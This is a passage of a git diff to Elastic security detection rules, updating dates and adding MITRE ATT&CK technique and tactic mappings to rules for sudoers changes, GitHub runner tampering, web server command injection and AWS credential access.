"auditd_manager"] maturity = "production" -updated_date = "2025/11/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,32 +99,79 @@ process where event.type == "start" and event.action in ("exec", "exec_event", " [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml index ebd0cb49ce7..f2c133d735b 100644 --- a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml +++ b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,49 +115,58 @@ not process.env_vars like~ "RUNNER_TRACKING_ID=github_*" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Initial Access" - id = "TA0001" - reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique]] - name = "Supply Chain Compromise" - id = "T1195" - reference = "https://attack.mitre.org/techniques/T1195/" - - [[rule.threat.technique.subtechnique]] - name = "Compromise Software Dependencies and Development Tools" - id = "T1195.001" - reference = "https://attack.mitre.org/techniques/T1195/001/" +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" - - [[rule.threat.technique]] - name = "Impair Defenses" - id = "T1562" - reference = "https://attack.mitre.org/techniques/T1562/" - - [[rule.threat.technique.subtechnique]] - name = "Disable or Modify Tools" - id = "T1562.001" - reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml index bfb7916cda2..407eeea5e48 100644 --- a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml +++ b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "auditd_manager", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,3 +127,77 @@ reference = "https://attack.mitre.org/techniques/T1190/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml index dbee870beb8..17b33e323b3 100644 --- a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml +++ b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "Device mount events were added as part of the Elastic Defend Device Control feature." min_stack_version = "9.2.0" -updated_date = "2025/11/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,34 +81,47 @@ host.os.type:(macos or windows) and event.type:device and event.action:mount and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1091" name = "Replication Through Removable Media" reference = "https://attack.mitre.org/techniques/T1091/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" + [[rule.threat.technique.subtechnique]] id = "T1052.001" name = "Exfiltration over USB" reference = "https://attack.mitre.org/techniques/T1052/001/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1091" +name = "Replication Through Removable Media" +reference = "https://attack.mitre.org/techniques/T1091/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["device.serial_number", "host.id"] diff --git a/rules/cross-platform/initial_access_file_upload_followed_by_get_request.toml b/rules/cross-platform/initial_access_file_upload_followed_by_get_request.toml index b2c14258864..9d7045d8171 100644 --- a/rules/cross-platform/initial_access_file_upload_followed_by_get_request.toml +++ b/rules/cross-platform/initial_access_file_upload_followed_by_get_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -143,3 +143,16 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/initial_access_ollama_api_external_access.toml b/rules/cross-platform/initial_access_ollama_api_external_access.toml index 4a059992f9c..7692634d9c0 100644 --- a/rules/cross-platform/initial_access_ollama_api_external_access.toml +++ b/rules/cross-platform/initial_access_ollama_api_external_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,14 +89,18 @@ network where event.action == "connection_accepted" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml index 6772035224b..8227fb80b3e 100644 --- a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml +++ b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2020/09/14" maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,14 +72,18 @@ Zoom meetings without passcodes are vulnerable to unauthorized access, known as [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml index e71c50e44c1..0e14d3d4a48 100644 --- a/rules/cross-platform/persistence_web_server_potential_command_injection.toml +++ b/rules/cross-platform/persistence_web_server_potential_command_injection.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -185,6 +185,16 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -198,6 +208,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" @@ -225,3 +240,57 @@ reference = "https://attack.mitre.org/techniques/T1595/003/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml index 1aa962b8f7f..5fab4d49a8f 100644 --- a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml +++ b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,19 +72,36 @@ The sudoers file is crucial in Unix-like systems, defining user permissions for [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml index 0c3fbef2c2e..24e3f7af143 100644 --- a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml +++ b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,3 +111,21 @@ framework = "MITRE ATT&CK" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/privilege_escalation_sudo_buffer_overflow.toml b/rules/cross-platform/privilege_escalation_sudo_buffer_overflow.toml index 895ef2afa05..204aea801c8 100644 --- a/rules/cross-platform/privilege_escalation_sudo_buffer_overflow.toml +++ b/rules/cross-platform/privilege_escalation_sudo_buffer_overflow.toml @@ -2,7 +2,7 @@ creation_date = "2021/02/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,17 +88,26 @@ Sudo is a critical utility in Unix-like systems, allowing users to execute comma [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.threshold] field = ["host.hostname"] value = 100 diff --git a/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml b/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml index 042c1dd3d5c..817a6c34543 100644 --- a/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml +++ b/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/13" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,3 +96,21 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/privilege_escalation_trap_execution.toml b/rules/cross-platform/privilege_escalation_trap_execution.toml index d94587dd5b0..64bf0260da2 100644 --- a/rules/cross-platform/privilege_escalation_trap_execution.toml +++ b/rules/cross-platform/privilege_escalation_trap_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,3 +84,21 @@ reference = "https://attack.mitre.org/techniques/T1546/005/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.005" +name = "Trap" +reference = "https://attack.mitre.org/techniques/T1546/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/aws/collection_cloudtrail_logging_created.toml b/rules/integrations/aws/collection_cloudtrail_logging_created.toml index 21998af8115..9c0e12dd9e0 100644 --- a/rules/integrations/aws/collection_cloudtrail_logging_created.toml +++ b/rules/integrations/aws/collection_cloudtrail_logging_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,17 +91,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml index d649ef077c5..20256d83f57 100644 --- a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml +++ b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,42 +121,52 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1619" name = "Cloud Storage Object Discovery" reference = "https://attack.mitre.org/techniques/T1619/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml index 7bf37ce9e83..eacc8d821e7 100644 --- a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml +++ b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/10" integration = ["aws"] maturity = "production" -updated_date = "2025/06/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,22 +95,39 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn"] diff --git a/rules/integrations/aws/credential_access_iam_compromisedkeyquarantine_policy_attached_to_user.toml b/rules/integrations/aws/credential_access_iam_compromisedkeyquarantine_policy_attached_to_user.toml index 39c54e4f149..57b2baeef95 100644 --- a/rules/integrations/aws/credential_access_iam_compromisedkeyquarantine_policy_attached_to_user.toml +++ b/rules/integrations/aws/credential_access_iam_compromisedkeyquarantine_policy_attached_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/20" integration = ["aws"] maturity = "production" -updated_date = "2025/11/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,17 +78,34 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml index d134a095da1..41cee1240b0 100644 --- a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml +++ b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,19 +101,42 @@ framework = "MITRE ATT&CK" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_rapid_secret_retrieval_attempts_from_secretsmanager.toml b/rules/integrations/aws/credential_access_rapid_secret_retrieval_attempts_from_secretsmanager.toml index 660e039719b..20d915624bf 100644 --- a/rules/integrations/aws/credential_access_rapid_secret_retrieval_attempts_from_secretsmanager.toml +++ b/rules/integrations/aws/credential_access_rapid_secret_retrieval_attempts_from_secretsmanager.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/11" integration = ["aws"] maturity = "production" -updated_date = "2025/11/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -130,22 +130,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.006" name = "Cloud Secrets Management Stores" reference = "https://attack.mitre.org/techniques/T1555/006/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.006" +name = "Databases" +reference = "https://attack.mitre.org/techniques/T1213/006/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" 